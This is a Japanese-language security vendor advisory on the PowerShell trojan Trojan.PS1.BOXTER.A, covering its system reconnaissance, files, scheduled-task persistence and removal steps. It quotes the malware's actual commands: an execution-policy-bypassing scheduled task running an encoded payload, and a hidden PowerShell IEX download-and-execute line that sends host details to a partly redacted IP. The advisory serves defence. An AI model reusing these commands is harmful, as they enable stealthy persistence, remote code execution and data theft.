Trojan.PS1.BOXTER.A
Windows
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
なし
感染報告の有無 :
はい
概要
トレンドマイクロは、このマルウェアをNoteworthy(要注意)に分類しました。
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- %System%\getmac.exe /FO CSV
(註:%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)
作成活動
マルウェアは、以下のファイルを作成します。
- %User Temp%\ccc.log
- %User Temp%\kkkk.log
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)
情報漏えい
マルウェアは、以下の情報を収集します。
- Mac Address
- installed AV
- OS Version
- OS architecture
- Domain
- Username
- Date
その他
マルウェアは、以下を実行します。
- If Administrator role:
- It connects to the following URL to download component loaded in its memory:
- http://cdn.{BLOCKED}dn.net/p?hig{Date}
- Creates scheduled task:
- Task Name: Winnet
- Trigger: Every 45 minutes
- Task Action: powershell -ep bypass -e {downloaded b64 encoded} /F
- Adds the following process to create a scheduled task:
- schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {downloaded b64 encoded}" /F
- If not Administrator role:
- It connects to the following URL to download component loaded in its memory:
- http://cdn.{BLOCKED}dn.net/p?low{Date}
- Creates scheduled task:
- Task Name: Winnet
- Trigger: Every 45 minutes
- Task Action: powershell -ep bypass -e {downloaded b64 encoded} /F
- Adds the following process to create a scheduled task:
- schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {downloaded b64 encoded}" /F
- If %UserTemp\%kkkk.log does not exists, it creates the file and terminates powershell processes running on the machine
- It adds the following process if no other instance of the program is running on the machine:
- /c powershell -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).downloadstring("http://{BLOCKED}.{BLOCKED}.103.152/updatev1?mac={mac address}av={av}version={OS version}bit={OS architecture}flag2={flag}domain={domain}user={username}PS={exeflag}
<補足>
情報漏えい
マルウェアは、以下の情報を収集します。
- Macアドレス
- インストールされたウイルス対策製品
- オペレーティングシステム(OS)のバージョン
- OSアーキテクチャ
- ドメイン
- ユーザ名
- 日付
その他
マルウェアは、以下を実行します。
- 管理者ロールの場合:
- 以下のURLに接続し、コンポーネントをダウンロードしてメモリ内に読み込みます。
- http://cdn.{BLOCKED}dn.net/p?hig{日付}
- スケジュールタスクの作成
- タスク名: Winnet
- トリガ: 45分毎
- タスクアクション: powershell -ep bypass -e {ダウンロードされたBase64エンコード} /F
- 以下のプロセスを追加して、スケジュールタスクを作成します。
- schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {ダウンロードされたBase64エンコード}" /F
- 以下のURLに接続し、コンポーネントをダウンロードしてメモリ内に読み込みます。
- 管理者ロールでない場合:
- 以下のURLに接続し、コンポーネントをダウンロードしてメモリ内に読み込みます。
- http://cdn.{BLOCKED}dn.net/p?low{日付}
- スケジュールタスクの作成
- タスク名: Winnet
- トリガ: 45分毎
- タスクアクション: powershell -ep bypass -e {ダウンロードされたBase64エンコード} /F
- 以下のプロセスを追加して、スケジュールされたタスクを作成します。
- schtasks.exe /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e {ダウンロードされたBase64エンコード}" /F
- %UserTemp\%kkkk.log が存在しない場合、マルウェアは当該ファイルを作成し、感染コンピュータ上で実行されている PowerShell プロセスを終了します。
- マルウェアは、プログラムの他のインスタンスが感染コンピュータ上で実行されていない場合は、以下のプロセスを追加します。
- /c powershell -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).downloadstring("http://{BLOCKED}.{BLOCKED}.103.152/updatev1?mac={Macアドレス}av={ウイルス対策製品}version={OSのバージョン}bit={OSアーキテクチャ}flag2={フラグ}domain={ドメイン}user={ユーザ名}PS={exeflag}
- 以下のURLに接続し、コンポーネントをダウンロードしてメモリ内に読み込みます。
対応方法
手順 1
Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
以下のファイルを検索し削除します。
- %User Temp%\ccc.log
- %User Temp%\kkkk.log
手順 4
スケジュールされたタスクを削除する
タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。
Windows 2000、Windows XP、Windows Server 2003の場合:
- [スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
- 上記の{タスク名} を、[名前]の欄に入力します。
- 入力した{タスク名} 持つファイルを右クリックします。
- [プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
- 上記の{実行するタスク}と文字列が一致するタスクを削除します。
Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合:
- Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。 - 左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
- 中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
- 中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
- 文字列が一致するタスクを削除します。
手順 5
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.PS1.BOXTER.A」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください